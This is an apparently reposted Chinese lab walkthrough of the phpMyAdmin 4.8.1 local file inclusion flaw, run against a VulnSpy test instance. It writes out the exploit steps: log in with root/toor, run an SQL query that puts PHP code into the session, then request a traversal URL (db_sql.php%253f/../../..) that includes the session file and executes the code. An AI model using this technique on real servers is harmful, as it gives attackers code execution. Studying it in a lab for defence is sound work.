phpMyAdmin 4.8.x(最新版) 本地文件包含漏洞利用

简介:

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

vulnspy

2. 等待载入设置后,点击 GO 按钮开启实验

vulnspy

3. 实验创建完成后,点击演示地址进入实验

vulnspy

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

vulnspy

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

select '<?php phpinfo();exit;?>'

vulnspy

6. 获取自己的SESSION ID

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

vulnspy

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用该漏洞

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

vulnspy

本文转载自:phpMyAdmin 4.8.x LFI Exploit - http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

目录
相关文章
|
3月前
|
Ubuntu Linux iOS开发
操作系统下载网址汇总
【8月更文挑战第31天】以下是常见操作系统的官方及可靠下载源简介: - **Windows**:可通过“MSDN我告诉你”(&lt;https://msdn.itellyou.cn/&gt;)和“Techbench by WZT”(&lt;https://techbenchbywzt.com/&gt;)下载各版本镜像。
298 1
|
7月前
|
安全 数据安全/隐私保护 Windows
Windows文件搜索神器Everything安装配置结合内网穿透实现公网查询本地文件
Windows文件搜索神器Everything安装配置结合内网穿透实现公网查询本地文件
|
7月前
|
Java
BurpSuite2021.8.2版本安装使用
BurpSuite2021.8.2版本安装使用
65 1
|
7月前
|
Shell Python Windows
通过Python实现win11环境下FTP的上传与下载
通过Python实现win11环境下FTP的上传与下载
|
安全 网络安全 开发者
DedeCMS 5.7.106版本存在文件包含漏洞
攻击者可以通过操纵参数allurls来实现代码注入,并最终获得网站的控制权限。在/data/admin/allowurl.txt文件中写入的内容,并没有经过安全过滤,从而导致被成功绕过。由此可见,开发者应该严格限制用户输入的数据,避免类似漏洞的出现,确保网站的安全性和稳定性。
187 0
|
安全 关系型数据库 MySQL
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
368 0
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
|
安全 Shell 测试技术
Shopex V4.8.4|V4.8.5下载任意文件漏洞
利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。 自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。 找到一个漏洞,还是发出来吧。 读取任意文件漏洞: http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php 复制代码可以连上数据库。
2113 0
|
网络协议 Linux 数据安全/隐私保护
win10系统下搭建FTP服务器(完成文件上传与下载)
win10系统下搭建FTP服务器(完成文件上传与下载)
696 0
win10系统下搭建FTP服务器(完成文件上传与下载)
|
Web App开发 Python
www.lfd.uci.edu网站下载python库显示404解决办法
www.lfd.uci.edu网站下载python库显示404解决办法
672 0
www.lfd.uci.edu网站下载python库显示404解决办法
|
Go
Confluence 6 上传一个附加文件的新版本
有下面 2 种方法来上传一个附加文件的新版本,你可以: 上传与已有附件具有相同文件名的版本。使用 上传一个新版本(Upload a new version)   按钮来进行上传(这个在文件预览界面中才能进行上传)不同文件名的附件,这个操作只针对图片和 PDF 文件。
702 0